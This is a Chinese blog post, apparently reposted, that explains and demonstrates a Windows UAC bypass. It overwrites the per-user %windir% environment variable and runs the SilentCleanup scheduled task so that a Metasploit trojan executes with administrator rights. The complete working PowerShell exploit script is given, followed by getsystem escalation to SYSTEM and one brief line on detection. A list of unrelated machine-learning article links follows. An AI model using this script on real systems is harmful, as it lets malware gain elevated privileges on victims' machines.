修改%windir%配合计划任务实现bypassuac
本文共 966 字,大约阅读时间需要 3 分钟。
前言
查msf报错的时候偶然看到这篇文章,于是做了实验并进行记录。
原理
\Microsoft\Windows\DiskCleanup\SilentCleanup是windows中有一个系统默认的计划任务,它的内容是以administrator权限执行cmd /c %windir%\System32\cleanmgr.exe。而注册表可以修改环境变了%windir%,可以将其修改为powershell -ep bypass -w h 1.exe ;#来利用powershell以administrator权限执行恶意文件1.exe。;#可以截断后面的\System32\cleanmgr.exe。
实现
修改并执行powershell脚本:
if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { echo 123} else { $registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ExecutionPolicy bypass -WindowStyle hidden C:\Users\lisi\Desktop\1.exe ;#\System32\cleanmgr.exe" Set-ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name} 执行完后,1.exe将会以administrator权限执行。我的1.exe文件是msf的木马,如果其以administrator权限执行则可以执行getsystem命令来提权到system,结果如下:
防御方法
监控对注册表环境变量属性的更改,检测powershell命令。
参考文章
转载地址:http://kqraf.baihongyu.com/
你可能感兴趣的文章
【算法】- 动态规划的编织艺术
查看>>
用 TensorFlow 让你的机器人唱首原创给你听
查看>>
对比学习用 Keras 搭建 CNN RNN 等常用神经网络
查看>>
深度学习的主要应用举例
查看>>
word2vec 模型思想和代码实现
查看>>
怎样做情感分析
查看>>
用深度神经网络处理NER命名实体识别问题
查看>>
用 RNN 训练语言模型生成文本
查看>>
RNN与机器翻译
查看>>
用 Recursive Neural Networks 得到分析树
查看>>
RNN的高级应用
查看>>
TensorFlow-7-TensorBoard Embedding可视化
查看>>
一个隐马尔科夫模型的应用实例:中文分词
查看>>
轻松看懂机器学习十大常用算法
查看>>
一个框架解决几乎所有机器学习问题
查看>>
特征工程怎么做
查看>>
机器学习算法应用中常用技巧-1
查看>>
机器学习算法应用中常用技巧-2
查看>>
通过一个kaggle实例学习解决机器学习问题
查看>>
决策树的python实现
查看>>